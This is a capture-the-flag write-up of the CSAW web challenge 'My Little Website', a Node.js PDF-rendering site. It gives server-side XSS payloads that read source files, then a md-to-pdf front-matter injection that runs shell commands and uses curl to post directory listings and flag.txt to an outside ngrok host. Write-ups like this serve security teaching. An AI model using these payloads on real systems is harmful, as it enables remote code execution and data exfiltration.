My Little Website

WEB | 54 pts - 406 solves

Description: I am new to programming and made this simple pdf creater website here, hopefully it is secure enough :)... http://web.chal.csaw.io:5013

The challenge comes as a pdf rendering website, we can inject markdown or maybe...javascript. First thing, check for XSS:

<script> document.write(window.location) </script>

Ok, vulnerable, actually, it's Server-Side XSS, as we're not injecting code in the webpage (client-side), instead we executing code on the server-side of the application. Let's try something more interesting:

<script>document.write('<iframe src="/"></iframe>')</script>

We're inside /chal directory, node.js webapp, but index.js seems definitely something interesting for us, let's try to read it:

<script>
fetch('index.js')
  .then(response => response.text())
  .then(text => document.write(text))
</script>

That's a lot of info, but what's most important is the mdToPdf package, with a quick search we'll know that we can do RCE: https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880.

---js
require('child_process').execSync('ls -la > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

No flag here, let's try to look one directory above:

---js
require('child_process').execSync('ls -la .. > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

Here we go, read flag.txt:

---js
require('child_process').execSync('curl -d @../flag.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

CTF{pdf_c0nt1nu3s_70_5uCK}